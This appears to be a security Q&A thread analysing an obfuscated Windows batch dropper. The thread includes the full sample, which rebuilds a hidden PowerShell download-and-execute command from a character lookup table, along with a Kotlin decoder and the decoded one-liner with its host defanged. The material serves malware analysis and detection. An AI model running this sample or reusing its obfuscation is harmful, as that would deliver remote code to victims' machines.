
file.cmd

@echo off
REM Reviewer annotations: every REM line below was added for analysis, the
REM script itself is byte-for-byte the sample. This is a live dropper, do not run it.
REM How it works: the whole real command is rebuilt one character at a time
REM from positions in a 62-character lookup table, so no readable keyword
REM such as powershell, http or DownloadString appears anywhere in the file.
REM Decoded, it pipes a PowerShell download-and-execute one-liner into a
REM hidden powershell.exe. The recovered string is shown in the answer below.
REM Step 1: change into System32 so that the relative path used on the last
REM line resolves to System32\WindowsPowerShell\v1.0\powershell.exe. The cd on
REM its own is not the suspicious part, it is just plumbing for that path.
cd %SystemRoot%\System32
REM Step 2: build the lookup table HUkC. Twenty 3-character pieces plus "l8"
REM give 62 characters, addressed below as positions 0 through 61. Each line
REM appends its piece to the current value of the variable.
set HUkC=
Set HUkC=%HUkC%3Kt
Set HUkC=%HUkC%AkR
Set HUkC=%HUkC%Vgc
Set HUkC=%HUkC%6a0
Set HUkC=%HUkC%5Gz
Set HUkC=%HUkC%wD2
Set HUkC=%HUkC%JZE
Set HUkC=%HUkC%j7h
Set HUkC=%HUkC%xnv
Set HUkC=%HUkC%rob
Set HUkC=%HUkC%dSH
Set HUkC=%HUkC%qNW
Set HUkC=%HUkC%QXU
Set HUkC=%HUkC%Iui
Set HUkC=%HUkC%s1y
Set HUkC=%HUkC%L4Y
Set HUkC=%HUkC%BfC
Set HUkC=%HUkC%mPe
Set HUkC=%HUkC%FOT
Set HUkC=%HUkC%pM9
Set HUkC=%HUkC%l8
REM The caret escapes the pipe symbol for the parser, so aa holds a single
REM pipe character. It is spliced into the last line so that the pipe never
REM appears literally next to the powershell path.
set aa=^|
REM Step 3: assemble the PowerShell payload in the data variable. Every
REM HUkC:~N,1 reference is one character of the table. The first line pulls
REM positions 39,20,24 = I,E,x and 34,20,35 = N,E,W, so it reads: IEx("Iex(NEW-
REM where IEx is the Invoke-Expression alias.
set data=
Set data=%data%%HUkC:~39,1%%HUkC:~20,1%%HUkC:~24,1%("%HUkC:~39,1%%HUkC:~53,1%%HUkC:~24,1%(%HUkC:~34,1%%HUkC:~20,1%%HUkC:~35,1%-
REM Positions 28,48,18,53,8,2 = oBJect and 25,53,2 = net, followed by wE...
Set data=%data%%HUkC:~28,1%%HUkC:~48,1%%HUkC:~18,1%%HUkC:~53,1%%HUkC:~8,1%%HUkC:~2,1% %HUkC:~25,1%%HUkC:~53,1%%HUkC:~2,1%.%HUkC:~15,1%%HUkC:~20,1%
REM ...bcLient, closing paren, then DoWN...
Set data=%data%%HUkC:~29,1%%HUkC:~8,1%%HUkC:~45,1%%HUkC:~41,1%%HUkC:~53,1%%HUkC:~25,1%%HUkC:~2,1%).%HUkC:~16,1%%HUkC:~28,1%%HUkC:~35,1%%HUkC:~34,1%
REM ...loaDSTRIng, i.e. New-Object Net.WebClient .DownloadString. So far:
REM IEx("Iex(NEW-oBJect net.wEbcLient).DoWNloaDSTRIng('
Set data=%data%%HUkC:~60,1%%HUkC:~28,1%%HUkC:~10,1%%HUkC:~16,1%%HUkC:~31,1%%HUkC:~56,1%%HUkC:~5,1%%HUkC:~39,1%%HUkC:~25,1%%HUkC:~7,1%('
REM Positions 23,2,2,57,42 = https, then 30,60,51 = dlm and 8 = c: the
REM download URL begins. Defanged host: dlm.capemn[.]com
Set data=%data%%HUkC:~23,1%%HUkC:~2,1%%HUkC:~2,1%%HUkC:~57,1%%HUkC:~42,1%://%HUkC:~30,1%%HUkC:~60,1%%HUkC:~51,1%.%HUkC:~8,1%
REM ...apemn.com/?dm, the start of a long opaque query string token
Set data=%data%%HUkC:~10,1%%HUkC:~57,1%%HUkC:~53,1%%HUkC:~51,1%%HUkC:~25,1%.%HUkC:~8,1%%HUkC:~28,1%%HUkC:~51,1%/?%HUkC:~30,1%%HUkC:~51,1%
REM The next eight lines are the rest of that query string, likely a campaign
REM or victim identifier, nothing executable is hidden in them.
Set data=%data%%HUkC:~18,1%%HUkC:~21,1%%HUkC:~26,1%%HUkC:~7,1%%HUkC:~13,1%%HUkC:~54,1%%HUkC:~19,1%%HUkC:~9,1%%HUkC:~20,1%%HUkC:~3,1%%HUkC:~61,1%%HUkC:~18,1%%HUkC:~2,1%
Set data=%data%%HUkC:~48,1%%HUkC:~53,1%%HUkC:~61,1%%HUkC:~57,1%%HUkC:~1,1%%HUkC:~56,1%%HUkC:~58,1%%HUkC:~50,1%%HUkC:~31,1%%HUkC:~7,1%%HUkC:~57,1%%HUkC:~5,1%%HUkC:~53,1%
Set data=%data%%HUkC:~6,1%%HUkC:~37,1%%HUkC:~60,1%%HUkC:~29,1%%HUkC:~43,1%%HUkC:~45,1%%HUkC:~50,1%%HUkC:~4,1%%HUkC:~47,1%%HUkC:~6,1%%HUkC:~39,1%%HUkC:~24,1%%HUkC:~58,1%
Set data=%data%%HUkC:~32,1%%HUkC:~49,1%%HUkC:~42,1%%HUkC:~50,1%%HUkC:~39,1%%HUkC:~45,1%%HUkC:~37,1%%HUkC:~10,1%%HUkC:~0,1%%HUkC:~54,1%%HUkC:~21,1%%HUkC:~0,1%%HUkC:~15,1%
Set data=%data%%HUkC:~28,1%%HUkC:~25,1%%HUkC:~30,1%%HUkC:~21,1%%HUkC:~61,1%%HUkC:~44,1%%HUkC:~5,1%%HUkC:~55,1%%HUkC:~31,1%%HUkC:~42,1%%HUkC:~55,1%%HUkC:~31,1%%HUkC:~55,1%
Set data=%data%%HUkC:~33,1%%HUkC:~21,1%%HUkC:~27,1%%HUkC:~21,1%%HUkC:~29,1%%HUkC:~55,1%%HUkC:~35,1%%HUkC:~40,1%%HUkC:~27,1%%HUkC:~45,1%%HUkC:~34,1%%HUkC:~56,1%%HUkC:~26,1%
Set data=%data%%HUkC:~39,1%%HUkC:~13,1%%HUkC:~3,1%%HUkC:~10,1%%HUkC:~3,1%%HUkC:~28,1%%HUkC:~6,1%%HUkC:~15,1%%HUkC:~0,1%%HUkC:~4,1%%HUkC:~16,1%%HUkC:~61,1%%HUkC:~17,1%
Set data=%data%/%HUkC:~35,1%%HUkC:~27,1%%HUkC:~39,1%%HUkC:~52,1%%HUkC:~3,1%%HUkC:~29,1%%HUkC:~0,1%%HUkC:~36,1%%HUkC:~6,1%%HUkC:~25,1%%HUkC:~3,1%%HUkC:~42,1%
REM Ends the URL and closes both calls: ...2Vh5')");
Set data=%data%%HUkC:~1,1%/%HUkC:~17,1%%HUkC:~6,1%%HUkC:~23,1%%HUkC:~12,1%')");
REM Step 4: the only line that does anything. After the batch parser's
REM percent pass, each doubled percent sign around data collapses to a single
REM literal percent sign and aa becomes the pipe, so the line reads:
REM   echo [percent]data[percent] pipe WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
REM The left side of a pipe runs in a child cmd.exe, which expands the data
REM reference a second time and writes the PowerShell payload into the pipe.
REM powershell.exe then reads its commands from stdin, that is the trailing
REM "-", with no profile, -nop, and a hidden window, -win 1. Net effect:
REM fetch whatever the server returns for that URL and Invoke-Expression it.
REM Detection hooks: cmd.exe spawning powershell.exe with -nop -win 1 - and a
REM stdin pipe, and a WebClient.DownloadString to a freshly registered domain.
echo %%data%%%aa%%HUkC:~35,1%%HUkC:~41,1%%HUkC:~25,1%%HUkC:~30,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~42,1%%HUkC:~52,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~53,1%%HUkC:~27,1%%HUkC:~31,1%%HUkC:~23,1%%HUkC:~53,1%%HUkC:~60,1%%HUkC:~60,1%\%HUkC:~26,1%%HUkC:~43,1%.%HUkC:~11,1%\%HUkC:~57,1%%HUkC:~28,1%%HUkC:~15,1%%HUkC:~53,1%%HUkC:~27,1%%HUkC:~42,1%%HUkC:~23,1%%HUkC:~53,1%%HUkC:~60,1%%HUkC:~60,1%.%HUkC:~53,1%%HUkC:~24,1%%HUkC:~53,1% -%HUkC:~25,1%%HUkC:~28,1%%HUkC:~57,1% -%HUkC:~15,1%%HUkC:~41,1%%HUkC:~25,1% %HUkC:~43,1% -
    It is obfuscated and runs in System32 so by default, yes. Also this seems to be rather offtopic.
    – AstroDan
    Commented May 8, 2018 at 15:53

1 Answer 1


Is it malicious

Yes. The `cd %SystemRoot%\System32` is not evidence by itself — it only makes the relative path `WindowsPowerShell\v1.0\powershell.exe` used on the last line resolve to the real PowerShell binary — but the combination of heavy obfuscation (every character is pulled out of a lookup table by index, so strings such as `powershell` and `http` never appear in the file) and what it decodes to (a hidden PowerShell that downloads and executes remote code) is the signature of a dropper, not of a legitimate script.

How is it malicious

Using the following script:

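/**
 * Minimal emulator of cmd.exe's percent expansion, written to de-obfuscate the
 * batch file above.
 *
 * Input: the batch script, read from the file named in args[0], or from stdin
 * when no argument is given. For every line it prints the raw text (">>>"),
 * the text after one expansion pass as the batch parser sees it ("<<<"),
 * the environment after a `set` line ("}}}"), and, for any other line that
 * still contains a %NAME% reference after the first pass, the result of a
 * second pass ("|||") — that is what the child cmd.exe spawned for the left
 * side of a pipe sees, which is how the sample's `%%data%%` trick works.
 *
 * Modelled: `set NAME=VALUE`, `%NAME%`, `%NAME:~START,LEN%`, the `%%` escape
 * for a literal percent sign, and `^x` escapes inside set values. Not
 * modelled: negative substring offsets, `%NAME:a=b%` substitution and delayed
 * `!NAME!` expansion. Undefined names expand to "" as they do in a batch file.
 * Lines that are not assignments are printed and skipped instead of aborting.
 */
fun main(args: Array<String>) {
    val script = if (args.isNotEmpty()) {
        java.io.File(args[0]).readText()
    } else {
        generateSequence(::readLine).joinToString("\n")
    }
    val environment = mutableMapOf<String, String>()
    // `set` is case-insensitive; the sample mixes `set` and `Set`.
    val assignRegex = Regex("\\s*[Ss][Ee][Tt]\\s+([A-Za-z_][A-Za-z0-9_]*)=(.*)")

    for (raw in script.lines()) {
        println(">>> $raw")
        val expanded = expandOnce(raw, environment)
        println("<<< $expanded")
        val assignment = assignRegex.matchEntire(expanded)
        if (assignment != null) {
            val (name, value) = assignment.destructured
            // `set aa=^|` stores a bare `|`: the caret only protects the pipe from the parser.
            environment[name] = value.replace(Regex("\\^(.)"), "$1")
            println("}}} $environment")
        } else if (expanded.contains('%')) {
            // e.g. `echo %%data%%|...` became `echo %data%|...`; the pipe child expands it again.
            println("||| " + expandOnce(expanded, environment))
        }
        println()
    }
}

/**
 * One left-to-right pass of cmd.exe percent expansion over [text] against [env].
 * `%%` yields a literal `%`; `%NAME%` yields the value (or "" when unset);
 * `%NAME:~START,LEN%` yields that substring, clamped to the value's bounds;
 * an unterminated `%` is copied through unchanged.
 */
private fun expandOnce(text: String, env: Map<String, String>): String {
    val out = StringBuilder()
    var i = 0
    while (i < text.length) {
        if (text[i] != '%') {
            out.append(text[i]); i++; continue
        }
        if (i + 1 < text.length && text[i + 1] == '%') {
            out.append('%'); i += 2; continue
        }
        val end = text.indexOf('%', i + 1)
        if (end < 0) {
            out.append(text, i, text.length); break
        }
        val ref = text.substring(i + 1, end)
        val colon = ref.indexOf(":~")
        val name = if (colon >= 0) ref.substring(0, colon) else ref
        val value = env[name] ?: ""
        if (colon >= 0) {
            val parts = ref.substring(colon + 2).split(',')
            val start = parts[0].trim().toInt().coerceIn(0, value.length)
            val len = if (parts.size > 1) parts[1].trim().toInt() else value.length - start
            out.append(value, start, (start + len).coerceIn(start, value.length))
        } else {
            out.append(value)
        }
        i = end + 1
    }
    return out.toString()
}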

(The script is only a partial model of cmd.exe's expansion rules, but it recovers enough to show what the batch file does.)

I get the following output:

    %IEx("Iex(NEW-oBJect net.wEbcLient).DoWNloaDSTRIng('hxxps://dlm.capemn[.]com/?dmJjvgGFZ6EA8JtBe8pKTMCSgpReVXlb1LCkYVIxMHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3QVnAsK/2Vh5')");%^|WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -

The stray `%` at both ends and the `^|` in the middle are artifacts of the decoder, not of the malware: cmd.exe turns `%%` into a literal `%` and `^|` into `|`, so the line that actually runs is `echo %data%|WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -`. The left side of a pipe is executed by a child cmd.exe, which expands `%data%` a second time and writes the PowerShell one-liner into the pipe; `powershell.exe -` reads its commands from stdin, `-nop` skips profiles and `-win 1` hides the window. So the batch file fetches whatever `dlm.capemn[.]com` serves for that query string and hands it to Invoke-Expression; the downloaded stage is not in the sample, so what it does is unknown from here. The URL no longer served anything when I tried it; decoding the URL only needs the single-character lookups the script does handle, so the more likely explanation is that the server had already been taken down rather than a decoding error.

The domain is also very young (registered 2018-04-10T18:51:53Z, about a month before this question). A throwaway domain registered shortly before the campaign and abandoned once it is detected is typical of the download infrastructure behind this kind of dropper.

Extra info

With the domain above, I found the following report: https://www.reverse.it/sample/133a2baaa832f7d50f7544f82c4ea8f4ec8550422bb4407a42eb4e7206a69940?environmentId=100
